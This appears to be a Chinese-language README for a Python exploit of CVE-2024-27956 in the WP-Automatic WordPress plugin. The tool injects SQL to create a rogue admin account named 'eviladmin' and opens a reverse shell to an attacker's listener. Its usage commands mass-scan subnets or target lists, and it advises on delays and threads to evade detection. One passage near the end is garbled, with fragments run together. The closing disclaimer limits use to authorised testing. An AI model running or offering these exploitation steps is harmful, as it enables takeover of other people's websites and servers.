WordPress Auto Admin Account and Reverse Shell cve 2024 27956
1.0.0
此Python腳本自動化了在WordPress站點中創建新的管理員帳戶並在目標服務器上執行反向外殼的過程。它利用WP-Automation插件的CSV注入漏洞在WordPress數據庫上執行SQL查詢並獲得管理訪問。
掃描子網:如果要掃描一個子網中的易受傷害的WordPress安裝,則可以使用--subnet選項。例如:
python wp-automatic-exploit.py --subnet 192.168.1.0/24 --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 1.0
此命令將掃描具有弱勢WP自動插件的WordPress網站的192.168.1.0/24子網,並嘗試使用提供的偵聽器設置來利用它們。
自定義延遲:可以使用--delay選項調整請求之間的延遲。較高的延遲可能有助於避免檢測或限制限制,而較低的延遲可以加快剝削過程。例如:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 2.5
此命令將在請求之間使用2.5秒的延遲。
使用遠程偵聽器:如果您的偵聽器是在遠程計算機上設置的,則可以使用--lhost and --lport選項指定其IP地址和端口。例如:
python wp-automatic-exploit.py --targets targets.txt --lhost 192.168.1.100 --lport 8080 --threads 10 --delay 1.0
此命令將在192.168.1.100:8080連接回偵聽器。
增加線程的數量:您可以將腳本使用的線程數與the --threads選項增加。這可以加快剝削過程,但也可能會增加檢測的可能性或引起限制速率的問題。例如:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 20 --delay 1.0
此命令將使用20個線程進行開發。
requests庫(通過pip install requests安裝)domain變量。eviladmin的新管理用戶,設置密碼並分配管理特權。注意:在運行此腳本之前,請確保您擁有適當的授權和權限,因為如果被濫用,它可能會導致安全漏洞和法律後果。
此腳本僅用於教育和測試目的。作者對此腳本的任何未經授權或非法使用不承擔任何責任。使用它自己的風險。